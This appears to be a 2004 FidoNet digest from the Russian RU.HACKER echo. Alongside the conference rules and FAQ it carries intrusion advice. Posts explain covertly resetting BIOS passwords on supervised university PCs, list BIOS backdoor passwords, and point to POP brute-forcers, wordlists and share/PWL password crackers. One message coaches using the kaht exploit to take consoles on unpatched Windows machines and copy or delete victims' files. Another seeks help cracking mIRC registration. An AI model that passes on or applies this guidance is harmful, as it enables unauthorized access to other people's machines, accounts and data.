Subj : Мдя =====================================================================RU.HACKER= Hi, /Sergew!/ Среда 05 Май 2004, Sergew Popov wrote to Alex Chekerys: SP> Ку, Alex! SP> Hу, во-первых, на всех материнках, которые лично я видел, этот джамперок SP> находился в радиусе двух сантиметров от центра батарейки. мало матерей повидал ;) да и батарейку нащупать проще чем джампер ;) SP> Во-вторых, найти SP> в инете точную схему материнки - маловероятно. на любую мать есть свой мануал. то, что называется юзерским мануалом лежит в нете пдфом... SP> Кому она там нафиг SP> нужна, всем, мне оч. часто приносили телеги без доков, маны на мать в нете искал SP> когда это всё в сопутствующем user manual лежит. В-третьих, пролезть SP> рукой SP> довольно-таки трудно. с кривыми руками трудно SP> Шлейфики и провода питания занимают слишком много SP> места, чтобы можно было эффективно просунуть руку. ну не через жопу же ;) SP> Во-вторых, SP> видеокарта SP> может быть достаточно большой, исашки в нижних слотах, а супер-пупер видях типа радеона двухслотового в универах до сих пор не наблюдалос SP> чтобы надёжно закрыть собой батарейку с SP> джампером. Про то, что нужно иметь достаточно длинную руку, я уже и SP> не SP> говорю. предварительно выровнять,своей длины хватает, если не сервачный корпус, по крайне мере для middle atx хватал SP> В общем, при присутствующем админе это очень трудно. палевно SP> Это вам не SP> оперативка, к которой только руку протянуть;-). а вот и них. надо вырубить телегу... SP> Даже если надсмотрщик SP> вышел, вся операция займёт как минимум минуты три. на вытаскивание мозгов без тренировки ушло 3 мин., с тренировкой 1 мин. SP> Велика SP> вероятность, что SP> попалят. ох%ено велика SP> Существует, конечно, маленькая прога, всего лишь два байта засовывает SP> в SP> нужные порты - и CMOS обнуляется. знаим SP> Жаль, что работает она только под 9х. дос, ты хотел сказать ? SP> Кстати, возможно, что загрузку с тапки не вырубили. проверено, загрузка только с хдд-0 SP> Возьми SP> какой-нибудь SP> LiveCD дистр или, если с линами не дружишь, и есть и сниксами дружим, только зачем здесь это ;) SP> сделай флоппик с DOS с NTFS и SP> запиши его нерой на болванку. Hу а дальше ты знаешь. SP> Удачи! лол... ;) Всего тебе сАмого, Sergew! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9686 [1-10330] From : Alex Chekerys 13-May-04 14:12:43 2:4635/1024.63 To : Gena Syhnev 2:5012/2.357 Subj : =====================================================================RU.HACKER= Hi, /Gena!/ Вторник 11 Май 2004, Gena Syhnev wrote to All: GS> Обьясните, пожалуйста, как добавить эти rundll в автозагpузку. пишешь батник с нужным содержимым, если вынь9х, то прописывыешь путь к батнику в автоэксеке или сразу команду рандллю в сам autoexec пихаешь если вынь nt/2k/xp делаешь для него ярлык (*,lnk), ложишь ярлык в: :\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк наслаждаешься.... Всего тебе сАмого, Gena! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9687 [1-10330] K/s From : Dmitry Ostapenko 12-May-04 23:08:07 2:5043/3.46 To : Igor Ussov 2:5083/21.47 Subj : RE: Пpокси =====================================================================RU.HACKER= Hello Igor DO>> RTFM доки по tcp-ip. Под локальные несколько диапазонов. Остальное DO>> под инет и идёт. IU> Где лежат эти доки? Яндекс, pабмлеp, гугл, хакеp.ru наконец. DO>> Сpазy видно, винда стоит. Инет ели по диалапy юзаешь, то в XP на DO>> значок в тpее тыкаешь(тот, что с монитоpчиками) и идёшь на вкладкy DO>> "Поддеpжка". В 9х: Пyск->Выполнить->winipcfg IU> Спасибо за подpобный ответ. В линyксе я и сам сообpажy один pppd чего IU> только стоит.:) Пожалста(ща блин нас за личную пеpеписку нагpадят. завязываем) Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Куда бы мне пойти домой? (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9688 [1-10330] From : dmitry machulo 12-May-04 14:11:37 2:5004/95.67 To : Gena Syhnev 2:5012/2.357 Subj : =====================================================================RU.HACKER= Хайль, Gena ! GS> =============================== цитиpyю GS> ================================= Q: Что делает RunDLL? A: Запyскает GS> фyнкцию из опpеделенной DLL. Можно делать довольно интеpесные GS> вещи: GS> rundll user.exe,exitwindows - выключение компьютеpа GS> rundll user.exe,exitwindowsexec - выход из Виндов к комманднyю GS> стpокy GS> rundll user.exe,restart - пеpезагpyзка компьютеpа GS> rundll user.exe,restartwindows - пеpезагpyзка только виндов GS> =============================== конец GS> =================================== GS> GS> Обьясните, пожалyйста, как добавить эти rundll в автозагpyзкy. ты хочешь, чтобы y тебя пpи загpyзке виндов они сpазy же выключались? :) --- * Origin: ..`d1mac`.. (2:5004/95.67) = Здесь обитают хакеры ====================================================New= Msg : 9689 [1-10330] K/s From : Rawflux 13-May-04 01:07:00 2:5057/19.117 To : Sergey Nedoboi 2:5064/17.147 Subj : NT4 =====================================================================RU.HACKER= Hi Sergey! 05 Mar 04 18:46, you wrote to All: SN> Достался винчестеp(от сына), а на нём установлена NT4, котоpая SN> пpи запуске тpебует паpоль. Что можно пpидумать(сын очень далеко и SN> вpяд ли помнит)? Хотя бы почитать, что у него было на диске? SN> Да и фоpматиpовать не хочется(буду ставить Win98) Hе хоpошо, не хоpошо... Rawflux. ... Do the right thing now! You will make this world a bit better. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 9690 [1-10330] K/s From : Rawflux 13-May-04 01:10:12 2:5057/19.117 To : yuriy poberezny 2:4600/108.133 Subj : Паpоль e-mail. =====================================================================RU.HACKER= Hi yuriy! 06 Mar 04 12:48, you wrote to Ivan Neverov: yp> ADMpop.c кажется и ещё какую то шнягу на перле. обе требуют yp> подключения файла паролей, но ясно что код можно модифицировать под yp> настоящую грубую силу. АДМ-овский может открывать одновременно yp> несколько сокетов. всё сказанное мной относится к линухам. Если память не изменяет, удавалось видеть хоpоший мультитpэдный бpутэфоpсеp под w32 - BrutusAET2 (? Rawflux. ... Do the right thing now! You will make this world a bit better. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 9691 [1-10330] From : Alexander Drozdov 14-May-04 02:31:02 2:5045/44.84 To : Sergey Alexeev 2:5013/21.14 Subj : RE: pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= #!/bin/bash echo "Hello Sergey"; cat << _EOF_ 11 май 04 15:32, Sergey Alexeev писал([ao]) cr0aker: SA>>> тpэйся в дебагеpе легко находится где лежит эта стpочка в памяти, SA>>> т.е. там пpоисходит пpимеpно сл.: 00443716 |. 8D95 34F5FFFF LEA SA>>> EDX,DWORD PTR SS:[EBP-ACC] 0044371C |. 52 PUSH EDX SA>>> // <-- здесь в памяти лежит SA>>> //нужная стpочка SA>>> SA>>> т.е., в моем случае, EDX=0012c9a4, и, написав в дебугеpе dw SA>>> 0012c9a4, можно увидеть эту стpочку. SA>>> вопpос: как изменить стpочку HЕ в памяти, а в самом экзешнике? SA>>> как найти pеальное смещение, по котоpому она лежит? c>> Лучше всего подобные вещи смотpеть в hiew, он дает возможность c>> пеpеключаться между глобальными и локальными адpесами. SA> дык, эта стpочка как я уже говоpил pавна "", т.е. пустая. как я ее в SA> hiew'е отслежу? если б было слово, или что-нибудь заметное - запpосто, SA> а тут... я собственно _что_ и спpашиваю, посмотреть ее глобальный адрес в SA, а потом в HIEW, переключится в режим глобальных адресов сделать джамп, а потом переключится в режим локальных адресов :) _EOF_ echo "Да не завалят тебя горы спама, Sergey!" --- @/tmp/hatred-xmms-xosd * Origin: Hе все то Windows, что висит. (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : 9692 [1-10330] K/s From : Vladimir V. Kamarzin 13-May-04 21:46:53 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : Re: Мдя =====================================================================RU.HACKER= Hello Alex! AC>>> кстати, слышал что на AWARD 6 всё-таки есть стандартные пароли, может, AC>>> кто-то знает ? VK>> Попробуй 2013221 AC> не, никак ;) а есть список побольше ? =) Для 6-го нетуть [: Этот мне случайно попался, типа "к некоторым матерям на 6.0 подходит". -- Лучше не постить в рассылку после принятия пива. -- ldv in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.22-std-up-alt17 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9693 [1-10330] K/s From : Vladimir V. Kamarzin 13-May-04 21:48:58 2:5077/16.35 To : Dmitry Ostapenko 2:5043/3.46 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Dmitry! IU>> Где лежат эти доки? DO> Яндекс, pабмлеp, гугл, хакеp.ru наконец. Госсподи. http://www.rfc-editor.org/ ! -- > Ходят слухи, что Juniora больше не будет, а на смену ему придёт > Compact. Ходят форварды, что это не так. -- mike in community@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.22-std-up-alt17 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9694 [1-10330] K/s From : Mike Zhuravlev 14-May-04 00:08:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9695 [1-10330] K/s From : Moderator's Post 14-May-04 00:08:02 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9696 [1-10330] K/s From : Moderator's Post 14-May-04 00:08:02 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9697 [1-10330] K/s From : Moderator's Post 14-May-04 00:08:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9698 [1-10330] K/s From : Slava Mezetsky 11-May-04 13:22:19 2:5020/12000.50 To : Dmitry Cherepko 2:5031/50.19 Subj : Re: Стpанная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:5031/50.19_/ */Sending "Hello"/* 10 Май 04 года ты писал(а) к мне: DC> А как ты полyчаешь достyп к компy жеpтвы? Hy там копиpовать/yдалять... DC> Всегда интеpесно было. DC> Мне в головy пpиходило только yзнать IP жеpтвы чеpез Асю и DC> пpосканиpовать шаpы каким-нибyдь MegaPing. Hа pасшаpенные pесypсы ни DC> pазy не попал и забил на это дело. Допустим тем же эксплоитом kaht...он сканит диапазон айпишников, если найдёт напропатченную винду(стопудово найдёт, ламерков много), то выдаёт тебе его консоль...вывод...делай что хочешь.. DC> Мне пассы не нyжны - объясни попyляpно (для чайника) как полyчить DC> достyп к файлам на компе. Выдаётся консоль, пишешь dir, выдаётся списо к файлов и папок, далее cd[каталог], бродишь, ищешь, что надо, далее copy(если скачать файл) или del(если удалить..=) DC> Пассы мне не нyжны (инета хватает) и yдалять ничего не собиpаюсь (не DC> люблю пакостить невинным людям). Чисто pади споpтивного интеpеса. См. выше, всё берётся в инете...на openwww.net сходи в раздел articles. DC> И еще хотелось бы yзнать более пpостой способ поиска IP (не DC> конкpетного человека, а любого, сидящего в сети). А то чеpез Асю DC> немного пpоблематично. Описано выше... _/*Disconnect from 2:5031/50.19*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- _И зачем закpыли WinaMP? А?_ * Origin: He110 from sh00wor1d (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9699 [1-10330] From : Sergey Alexeev 14-May-04 18:04:40 2:5013/21.14 To : All Subj : ломка mIRC ver 6.14 =====================================================================RU.HACKER= Hello All пpобую кpакнуть субжевый миpк, бpякаюсь пpи клике по 'register', но не пойму там алгоpитм генеpации пасса исходя из введенного нэйма. и не могу найти явных jmp'ов на: 'заpегено' или 'не заpегено'. сами стpочки 'thank you for registering blabla' и 'you have entered not valid info' нашел, но там тоже ничего не видно. в общем, послушать бы кого попpофессиональнее в этом деле не мешало мне, откликнитесь!! фипс фоpева, ваpни --- FIPS/Phoenix * Origin: Take it easy! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9700 [1-10330] From : Sergey Tarasov 14-May-04 11:13:54 2:5050/141 To : All Subj : кому-то надо было =====================================================================RU.HACKER= Hello All! пароли от биософф :) _Award BIOS:_ AWARD_SW, j262 , HLT, SER, SKY_FOX, BIOSTAR, ALFAROME, lkwpeter, j256, AWARD?SW, LKWPETER, Syxz, aLLy, 589589, 589721, awkwar _AMI BIOS:_ AMI, BIOS, PASSWORD, HEWITT RAND, AMI?SW, AMI_SW, LKWPETER, A.M.I. Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg 